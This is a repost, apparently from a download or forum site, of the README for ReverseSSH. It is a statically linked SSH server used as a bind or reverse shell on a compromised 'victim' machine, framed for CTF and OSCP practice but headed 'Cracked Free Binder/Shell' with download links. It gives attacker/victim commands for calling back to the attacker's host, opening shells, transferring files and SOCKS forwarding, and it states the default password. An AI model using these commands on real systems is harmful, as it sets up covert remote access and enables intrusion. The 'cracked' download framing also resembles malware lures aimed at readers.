ReverseSSH Cracked Free Binder/Shell
ReverseSSH Cracked Free Binder/Shell
A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.
Has been developed and was extensively used during OSCP exam preparation.
Features
Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory? Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.
Instead, you can go the way to simply deploy the lightweight ssh server (<1.5MB) reverse-ssh onto the target, and use additional commodities such as file transfer and port forwarding!
ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following:
Fully interactive shell access (check caveats for old windows versions below)
File transfer via sftp
Local / remote / dynamic port forwarding
Can be used as bind- and reverse-shell
Supports Unix and Windows operating systems
Windows caveats
A fully interactive powershell on windows relies on Windows Pseudo Console ConPTY and thus requires at least Win10 Build 17763. On earlier versions you can still get an interactive reverse shell that can't handle virtual terminal codes such as arrow keys or keyboard interrupts. In such cases you have to append the cmd command, i.e. ssh <OPTIONS> <IP> cmd.
You can achieve full interactive shell access for older windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows in the same directory as reverse-ssh and then use flag -s ssh-shellhost.exe. This will pipe all traffic through ssh-shellhost.exe, which mimics a pty and transforms all virtual terminal codes such that windows can understand.
Requirements
Simply executing the provided binaries only relies on golang system requirements.
In short:
Linux: kernel version 2.6.23 and higher
Windows: Windows Server 2008R2 and higher or Windows 7 and higher
Compiling additionally requires the following:
golang version 1.15
optionally upx for compression (e.g. apt install upx-ucl)
Usage
Once reverse-ssh is running on the victim, you can connect with any username and the default password letmeinbrudipls, the ssh key or whatever you specified during compilation. After all, it is just an ssh server:
# Fully interactive shell access
$ ssh -p <RPORT> <RHOST>
# Simple command execution
$ ssh -p <RPORT> <RHOST> whoami
# Full-fledged file transfers
$ sftp -P <RPORT> <RHOST>
# Dynamic port forwarding as SOCKS proxy on port 9050
$ ssh -p <RPORT> -D 9050 <RHOST>
Running ReverseSSH as bind shell
# Victim
victim$ ./reverse-ssh
# Attacker (default password: letmeinbrudipls)
attacker$ ssh -p 31337 <RHOST>
Running ReverseSSH as reverse shell
Note: you can compile ReverseSSH with parameters for LHOST and LPORT to ease execution on the target, see below
# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
# NOTE: LPORT of 8888 collides with incoming connections; use the flag `-b 8889` or similar on the victim in that case
attacker$ ./reverse-ssh -v -l -p <LPORT>
# On victim
victim$ ./reverse-ssh -p <LPORT> <LHOST>
# or in case of an ssh daemon listening at port 22 with password authentication for user 'kali'
victim$ ./reverse-ssh -p 22 kali@<LHOST>
# On attacker (default password: letmeinbrudipls)
attacker$ ssh -p 8888 127.0.0.1
# or with ssh config from below
attacker$ ssh target
In the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22. Just prepend <USER>@ and provide the password once asked to do so. Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet...
For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key to ~/.ssh/ and simply call ssh target or sftp target afterwards:
Download Link
Download Link
[/center]
